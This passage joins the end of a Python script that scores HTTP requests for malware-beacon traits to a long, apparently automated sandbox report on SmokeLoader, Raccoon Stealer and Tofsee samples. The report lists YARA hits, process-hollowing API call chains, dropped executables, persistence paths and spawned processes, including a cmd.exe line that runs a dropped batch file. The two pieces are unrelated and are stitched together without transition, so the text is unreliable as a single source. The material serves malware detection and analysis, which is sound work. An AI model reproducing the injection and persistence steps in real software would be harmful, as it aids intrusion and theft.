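        hits.append("IE11/Trident user agent on Windows 10")
    try:
        length = int(h.get("content-length", "0"))
    except ValueError:
        length = 0
    if req.method == "POST" and 0 < length < 1024:
        hits.append("small POST body (%d bytes)" % length)
    return hits


def score(raw: str) -> int:
    """Number of heuristics tripped; three or more is worth an analyst's look (assumed cut-off)."""
    return len(beacon_indicators(parse_request(raw)))


if __name__ == "__main__":
    for label, raw in (("report POST", SAMPLE_REQUEST), ("browser login", BROWSER_LOGIN_REQUEST)):
        print(label, score(raw), beacon_indicators(parse_request(raw)))
```

The recorded POST trips all five heuristics; the browser control trips only the small-body one, which is why the count, not any single header, is the signal.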

                          Key, Mouse, Clipboard, Microphone and Screen Capturing:

                          Yara detected SmokeLoader
                          Source: Yara matchFile source: 16.2.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.1.adijaeg.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.sbxGIUIhRd.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.95C6.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.2.adijaeg.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.1.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 16.0.95C6.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sbxGIUIhRd.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.adijaeg.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.767064606.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719013921.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.921866016.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.706607181.0000000004DC1000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.787707490.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719027443.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.787566424.0000000002030000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.920736016.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.766964771.0000000000420000.00000004.00000001.sdmp, type: MEMORY
                          Source: 8A6B.exe, 0000000C.00000000.764316157.000000000074A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                          E-Banking Fraud:

                          Yara detected Raccoon Stealer
                          Source: Yara matchFile source: 00000029.00000002.932916871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.866964276.0000000004E90000.00000004.00000001.sdmp, type: MEMORY

                          Spam, unwanted Advertisements and Ransom Demands:

                          Yara detected Tofsee
                          Source: Yara matchFile source: 19.2.E2A6.exe.560e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.svchost.exe.2360000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.3.gaystiqf.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.E2A6.exe.580000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E2A6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.850000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E2A6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.svchost.exe.2360000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.850000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000026.00000002.979557466.0000000002360000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.809196350.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.805779040.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.808208197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.803426452.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.785124178.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.803137475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.809631719.0000000000850000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: E2A6.exe PID: 4752, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: gaystiqf.exe PID: 4588, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5288, type: MEMORYSTR

                          System Summary:

                          PE file has nameless sections
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: B3EB.exe.5.drStatic PE information: section name:
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_0042B1B0
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_0042A3D0
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00424EA0
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_005631FF
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00563253
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402A5F
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402AB3
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402A5F
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402AB3
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402A5F
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_004027CA
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00401FF1
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0040158E
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_004015A6
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_004015BC
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00411065
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00412A02
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0040CAC5
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_00410B21
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_004115A9
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_0059160C
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_005915DE
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exeCode function: 12_2_005915F6
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 13_2_00563253
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 13_2_005631FF
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402A5F
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402AB3
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402A5F
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402B2E
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00410800
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00411280
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004103F0
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_004109F0
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00640640
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00640C40
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_00640A50
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: 18_2_006414D0
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_0040C913
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_0042B160
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_0042A380
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00424E50
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_027D96F0
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_027D0470
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_027D0463
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_0285DE18
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_02858657
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_02858DE8
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_02858DF8
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_04F300F1
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_0040C913
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_0042B160
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_0042A380
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_00424E50
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                          Source: sbxGIUIhRd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: sbxGIUIhRd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: sbxGIUIhRd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: sbxGIUIhRd.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 96DB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 96DB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 96DB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 96DB.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8A6B.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8A6B.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 8A6B.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 95C6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 95C6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 95C6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 95C6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: CFE8.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: CFE8.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: CFE8.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: CFE8.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E2A6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E2A6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E2A6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: E2A6.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BBBC.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BBBC.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: BBBC.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C487.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7D38.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7D38.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: 7D38.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: adijaeg.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: adijaeg.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: adijaeg.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: adijaeg.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gaystiqf.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gaystiqf.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gaystiqf.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: gaystiqf.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeSection loaded: mscorjit.dll
                          Source: sbxGIUIhRd.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\txlhcyih\
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: String function: 0041E390 appears 172 times
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: String function: 00422C10 appears 133 times
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exeCode function: String function: 004048D0 appears 460 times
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: String function: 0040EE2A appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: String function: 00402544 appears 53 times
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: String function: 0041E320 appears 32 times
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: String function: 0041E320 appears 32 times
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 0_2_00560110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_2_00402491 NtOpenKey,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeCode function: 1_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Roaming\adijaegCode function: 10_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 13_2_00560110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00401962 Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_0040196D Sleep,NtTerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00401A0B NtTerminateProcess,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_2_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402084 LocalAlloc,NtQuerySystemInformation,
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeCode function: 16_1_00402491 NtOpenKey,
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_04F3F5C0 NtUnmapViewOfSection,
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exeCode function: 21_2_04F3F6A0 NtAllocateVirtualMemory,
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                          Source: 8A6B.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: BBBC.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: 7D38.exe.5.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: B3EB.exe.5.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                          Source: CF17.exe.5.drStatic PE information: Section: .rsrc ZLIB complexity 0.997721976577
                          Source: A15C.exe.5.drStatic PE information: Section: .rsrc ZLIB complexity 0.997770524618
                          Source: B3EB.exe.5.drStatic PE information: Section: ZLIB complexity 1.00044194799
                          Source: B3EB.exe.5.drStatic PE information: Section: ZLIB complexity 1.00537109375
                          Source: B3EB.exe.5.drStatic PE information: Section: ZLIB complexity 1.00051229508
                          Source: B3EB.exe.5.drStatic PE information: Section: ZLIB complexity 1.0107421875
                          Source: C487.exe.5.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                          Source: sbxGIUIhRd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\adijaeg
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@60/26@82/18
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeFile read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                          Source: C:\Users\user\AppData\Local\Temp\A15C.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\63DC.bat C:\Users\user\AppData\Local\Temp\A15C.exe
                          Source: sbxGIUIhRd.exeVirustotal: Detection: 36%
                          Source: sbxGIUIhRd.exeReversingLabs: Detection: 48%
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\sbxGIUIhRd.exe "C:\Users\user\Desktop\sbxGIUIhRd.exe"
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exeProcess created: C:\Users\user\Desktop\sbxGIUIhRd.exe "C:\Users\user\Desktop\sbxGIUIhRd.exe"
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
                          Source: C:\Users\user\AppData\Roaming\adijaegProcess created: C:\Users\user\AppData\Roaming\adijaeg C:\Users\user\AppData\Roaming\adijaeg
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8A6B.exe C:\Users\user\AppData\Local\Temp\8A6B.exe
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\95C6.exe C:\Users\user\AppData\Local\Temp\95C6.exe
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exeProcess created: C:\Users\user\AppData\Local\Temp\95C6.exe C:\Users\user\AppData\Local\Temp\95C6.exe
